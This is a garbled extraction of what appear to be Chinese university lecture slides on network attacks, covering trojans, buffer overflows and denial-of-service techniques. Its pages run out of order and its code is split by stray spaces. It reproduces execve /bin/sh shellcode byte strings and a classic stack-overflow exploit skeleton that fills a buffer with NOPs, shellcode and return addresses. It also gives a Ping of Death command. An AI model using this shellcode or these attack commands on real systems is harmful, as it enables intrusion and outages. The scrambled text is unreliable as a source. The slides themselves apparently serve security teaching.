【正文】 進(jìn)攻受害者?？梢岳眠@一過程，建立數(shù)以萬計(jì)的半連接，消耗掉 CPU的時間及內(nèi)存，使服務(wù)器無法回應(yīng)正常用戶的請求。 ? 目標(biāo)平臺：任何應(yīng)答 ICMP數(shù)據(jù)的系統(tǒng) 20 8 28IP UDP Date24 4FO DateAll rights reserved 169。 2022, Southeast University Page 28 拒絕服務(wù)攻擊（ 4） ? Land ? 原理：向目標(biāo)機(jī)發(fā)送源地址與目的地址一樣的數(shù)據(jù)包，造成目標(biāo)機(jī)解析Land包占用太多資源，從而使網(wǎng)絡(luò)功能完全癱瘓。若在 IP分組中指定一個非法的偏移值，將造成某些協(xié)議軟件出現(xiàn)緩沖區(qū)覆蓋，導(dǎo)致系統(tǒng)崩潰。如果 IP層要傳輸?shù)臄?shù)據(jù)包長度超過了 MTU， 則 IP層就要對數(shù)據(jù)包進(jìn)行分片，使每片長度小于等于 MTU。 2022, Southeast University Page 26 拒絕服務(wù)攻擊（ 2） ? 配置修改型 ? 改變路由信息 ? 修改 Windows NT注冊表 ? 修改 UNIX的各種配置文件 ? 物理破壞型 ? 計(jì)算機(jī)，路由器，網(wǎng)絡(luò)配線室，網(wǎng)絡(luò)主干段，電源，其他設(shè)備等 ? 服務(wù)利用型：利用 TCP/IP協(xié)議棧的漏洞，如允許碎片包，大數(shù)據(jù)包， IP路由選擇，半公開 TCP連接，數(shù)據(jù)包 Flood等 ?拒絕服務(wù)常見手段分析 ? 死亡之 Ping（ Ping of Death） ? 原理：向目標(biāo)端口發(fā)送大量超大尺寸的 ICMP包來實(shí)現(xiàn) ? 目標(biāo)平臺： Windows 9x ? 實(shí)現(xiàn)：在命令行輸入“ ping _165535目標(biāo)主機(jī) ip” All rights reserved 169。 2022, Southeast University Page 24 緩沖區(qū)溢出（ 8） ?緩沖區(qū)溢出的保護(hù) ? 編寫正確的代碼 ? 非執(zhí)行的緩沖區(qū) ? 數(shù)組邊界檢查 ? Compaq C編譯器 ? C的數(shù)組邊界檢查 ? 存儲器存取檢查 ? 類型 安全語言 ? 程序指針完整性檢查 ? 手寫的堆棧監(jiān)測 ? 堆棧保護(hù) ? 指針保護(hù) All rights reserved 169。 2022, Southeast University Page 23 緩沖區(qū)溢出（ 7） ?漏洞與攻擊的分析 ? 代碼放置的方法 ? 殖入法 ? 利用已經(jīng)存在的代碼 ? 控制程序轉(zhuǎn)移的方法 ? 激活記錄（ Activation Records） ? 函數(shù)指針（ Founction Pointers） ? 長跳轉(zhuǎn)緩沖區(qū)（ Longjmp buffers） ? 代碼殖入和流程控制技術(shù) ? 綜合代碼殖入和激活記錄 ? 把代碼作為參數(shù)，利用緩沖區(qū)溢出改變程序的參數(shù)，使程序指針指向 libc中特定的代碼段。 } All rights reserved 169。 pri ntf ( “ D i scov ered an d C od ed by B l oo dm ask an d V i o, C ov i n 1 99 6 \ n ” )。 * ptr = 0。 i + + ) * ( a d d r _ p t r + + ) = g e t _ e s p ( ) + o f s 。 f o r ( i = 0 。 i + + ) * ( p t r + + ) = e x e c s h e l l [ i ] 。 / * s t i c k a s m c o d e i n t o t h e b u f f e r * / f o r ( i = 0 。 / * f i l l s t a r t o f b u f f e r w i t h n o p s * / m e m s e t ( p t r , 0 x 9 0 , B U F F E R _ S I Z E s t r l e n ( e x e c s h e l l ) ) 。 e x i t ( 0 ) 。 All rights reserved 169。 i n t i 。 u n s i g n e d l o n g * a d d r _ p t r = N U L L 。 } m a i n ( i n t a r g c , c h a r **a r g v ) { u _ c h a r e x e c s h e l l [ ] = “ \ x e b \ x24 \ x5e \ x8d \ x1e \ x89 \ x5e \ x0b \ x33 \ xd2 \ x89 \ x56 \ x07 \ x89 \ x56 \ x0f ” “ \ xb8 \ x1b \ x56 \ x34 \ x12 \ x35 \ x10 \ x56 \ x34 \ x12 \ x8d \ x4e \ x0b \ x8b \ xd1 \ x c d ” “ \ x80 \ x33 \ x c 0 \ x40 \ x c d \ x80 \ x e 8 \ xd7 \ x f f \ x f f \ x f f / b i n / s h ” 。 } All rights reserved 169。 i + + ) l a r g e _ s t r i n g [ i ] = s h e l l c o d e [ i ]。 f o r ( i = 0 。 i 3 2 。 l o n g *l o n g _ p t r = ( l o n g * ) l a r g e _ s t r i n g 。 V o i d m a i n ( ) { char bu ff er [ 9 6 ] 。 2022, Southeast University Page 19 緩沖區(qū)溢出（ 3） ? 通過緩沖區(qū)溢出獲得用戶 shell c h a r s h e l l c o d e [ ] = “ \ x e b \ x1f \ x5e \ x89 \ x76 \ x08 \ x31 \ x c 0 \ x88 \ x46 \ x07 \ x89 \ x46 \ x0c \ xb0 \ x0b ” “ \ x89 \ x f 3 \ x8d \ x4e \ x08 \ x8d \ x56 \ x0c \ x c d \ x80 \ x31 \ xdb \ x89 \ xd8 \ x40 \ x c d ” “ \ x80 \ x e 8 \ xdc \ x f f \ x f f \ x f f / b i n / s h ” 。 f u n c tio n ( la r g e _ s tr in g ) 。 i 2 5 5 。 in t i。 s tr c p y ( b u f f e r , s tr ) 。 2022, Southeast University Page 18 緩沖區(qū)溢出（ 2） ? 一個簡單的溢出： void function (char *str) { char buffer[16] strcpy (buffer, str)。 ? 單單的緩沖區(qū)溢出并不會產(chǎn)生安全問題，只有將溢出送到能夠以 root權(quán)限運(yùn)行命令的區(qū)域才會產(chǎn)生威脅。 2022, Southeast University Page 17 緩沖區(qū)溢出（ 1） ?基本概念（ buffer overflow） ? 程序在內(nèi)存中的位置 ? 堆棧是一個先入后出的隊(duì)列，它的生長方向與內(nèi)存的生長方向相反 ?緩沖區(qū)溢出的原理 ? 向一個有限空間的緩沖區(qū)復(fù)制超長的字符串，而程序自身卻沒有進(jìn)行有效的檢驗(yàn)，導(dǎo)致程序運(yùn)行失敗，系統(tǒng)重新啟動，甚至停機(jī)。 2022, Southeast University Page 16 木馬（ 3） – 木馬運(yùn)行時的隱蔽 – 木馬在內(nèi)存中的隱蔽 ? 頑固性：即使木馬被發(fā)現(xiàn)存在于計(jì)算機(jī)中，也很難被刪除。 – 木馬文件名：與 Windows的系統(tǒng)文件接近。 2022, Southeast University Page 15 木馬（ 2） ? 木馬的基本功能 ? 讀和寫的功能 ? 運(yùn)行程序功能 ? 查看及終止目標(biāo)計(jì)算機(jī)進(jìn)程功能 ? 能方便地編輯注冊表，能捆綁到其他軟件上，能改變安裝地點(diǎn)及啟動方式，能改變端口，上網(wǎng)自動通知 ? 木馬的生存能力 ? 隱蔽性： – 木馬的啟動：注冊表、 、 。如果計(jì)算機(jī)被安裝了服務(wù)器程序，則黑客可使用控制器進(jìn)入計(jì)算機(jī)，通過命令服務(wù)器程序達(dá)到控制計(jì)算機(jī)的目的。 2022, Southeast University Page 14 木馬（ 1） ?木馬 ? 特洛伊木馬概念 ? 特洛伊木馬是一個包含在一個合法程序中的非法程序，該非法程序在